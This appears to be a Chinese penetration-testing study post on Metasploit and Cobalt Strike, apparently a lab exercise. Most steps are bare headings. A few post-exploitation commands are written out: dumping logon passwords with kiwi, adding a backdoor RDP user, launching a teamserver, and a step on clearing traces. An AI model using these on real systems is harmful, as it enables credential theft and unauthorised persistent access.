信安学习第十一期
·
1. msf的作用,并使用msfvenom生成木马并反弹meterpreter会话
Metasploit的作用
Metasploit是一个开源框架,旨在帮助渗透测试人员和安全专家评估和保护其网络和系统。Metasploit包含多个模块,包括扫描器、漏洞验证工具、漏洞利用工具、载荷生成器
等,这些工具可以协同工作,使得渗透测试工作更加高效和准确。
安装和使用
kali系统已经内置了metasploit,无需安装,可以直接使用。
安装和更新Metasploit框架:
sudo apt-get update && apt-get install metasploit-framework
初始化数据库:
在 Metasploit 中使用数据库不是强制性的,没有数据库也可以运行得很好。但是,使 Metasploit 如此出
色的许多功能都需要数据库,而 msfdb 是设置 Metasploit 兼容数据库的最简单方法。
msfdb init #初次使用
msfdb start #启动数据库和网络服务。
msfdb stop #停止数据库和网络服务。
kali可以直接运行Metasploit:
sudo msfconsole
Msfvenom生成木马并反弹
设置监听器并生成木马

木马生成并上线


2. 使用msf完成黑客攻击内网初体验实验
选择合适exploit

搜索当前可用payload

设置监听器

攻击目标主机

查看目标主机的信息

查看主机是否运行在虚拟机上
run post/windows/gather/checkvm

获取主机信息

下载文件

上传文件

获取当前用户的信息

进程迁移

获取密码
kiwi_cmd "sekurlsa::logonpasswords"

查看目标主机有哪些用户
run post/windows/gather/enum_logged_on_users #查看目标主机有用户

使用enable_rdp脚本创建用户并开启远程桌面
run post/windows/manage/enable_rdp USERNAME=test2 PASSWORD=Abc123456 #添加用户

清楚痕迹

3. 安装部署Cobalt Strike服务端并使用客户端连接
服务端部署

服务端运行
nohup ./teamserver 192.168.153.132 Aa@123456 > teamserver.log 2>&1 &

客户端设置(连接服务端)

配置监听器

4. Cobalt Strike生成木马并成功控制肉鸡执行屏幕截屏操作步骤
木马生成


木马运行

cs上线,控制目标主机

会话操作


5. msf和Cobalt Strike间的会话传递步骤
监听器配置要一致
CS监听器配置

msf监听器配置

cs新建会话,将会话传递给msf

msf拿到会话权限

更多推荐
所有评论(0)